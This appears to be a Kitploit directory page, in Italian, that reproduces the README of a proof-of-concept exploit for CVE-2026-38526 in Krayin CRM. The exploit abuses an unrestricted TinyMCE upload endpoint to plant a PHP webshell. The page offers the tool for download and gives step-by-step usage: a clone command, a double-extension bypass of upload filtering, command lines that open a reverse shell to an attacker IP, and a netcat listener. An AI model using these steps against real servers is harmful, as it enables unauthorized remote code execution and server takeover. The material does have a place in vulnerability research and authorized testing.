Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-38526-POC — Prova di concetto di CVE-2026-38526 in Krayin CRM <= v2.2.x. Caricamento arbitrario di file che porta all'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/pawpic/cve-2026-38526-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

Prova di concetto di CVE-2026-38526 in Krayin CRM <= v2.2.x. Caricamento arbitrario di file che porta all'esecuzione remota di codice.

Vedi Repository
12123 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-38526 - Exploit RCE per Krayin CRM

Krayin CRM (≤ 2.2.x) - Caricamento file senza restrizioni che porta all'esecuzione remota di codice.

Questo PoC sfrutta l'endpoint vulnerabile di upload di TinyMCE (/admin/tinymce/upload) per caricare una webshell PHP e ottenere l'esecuzione di comandi sul server.


Caratteristiche

  • Accesso automatico completo con gestione del token CSRF
  • Elude le restrizioni di upload usando la doppia estensione
  • Supporta reverse shell ed esecuzione di singoli comandi
  • Aggiornamento affidabile del token CSRF di Laravel
  • Pulito e facile da usare

Download

git clone https://github.com/pawpic/CVE-2026-38526-POC

Requisiti

pip3 install requests beautifulsoup4

Utilizzo

  1. Reverse Shell (Predefinita e consigliata)
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  --lhost YOUR_IP \
  --lport 4444
  1. Comando singolo
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

Opzioni

ArgomentoDescrizioneObbligatorio
-u, --urlURL di base del targetSì
-e, --emailEmail di accessoSì
-p, --passwordPassword di accessoSì
-c, --cmdEsegui un singolo comandoNo
--lhostIl tuo IP per la reverse shellSì (se non si usa --cmd)
--lportPorta di ascoltoNo (predefinita: 4444)

Esempio di flusso di lavoro

Avvia listener:

nc -lvnp 4444

Esegui l'exploit:

python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

Dichiarazione di non responsabilità

Questo exploit è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'uso non autorizzato contro sistemi per i quali non si dispone di esplicita autorizzazione al test è illegale.

Versioni interessate

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526


Autore: pawpic Data: 2026

Scarica lo strumento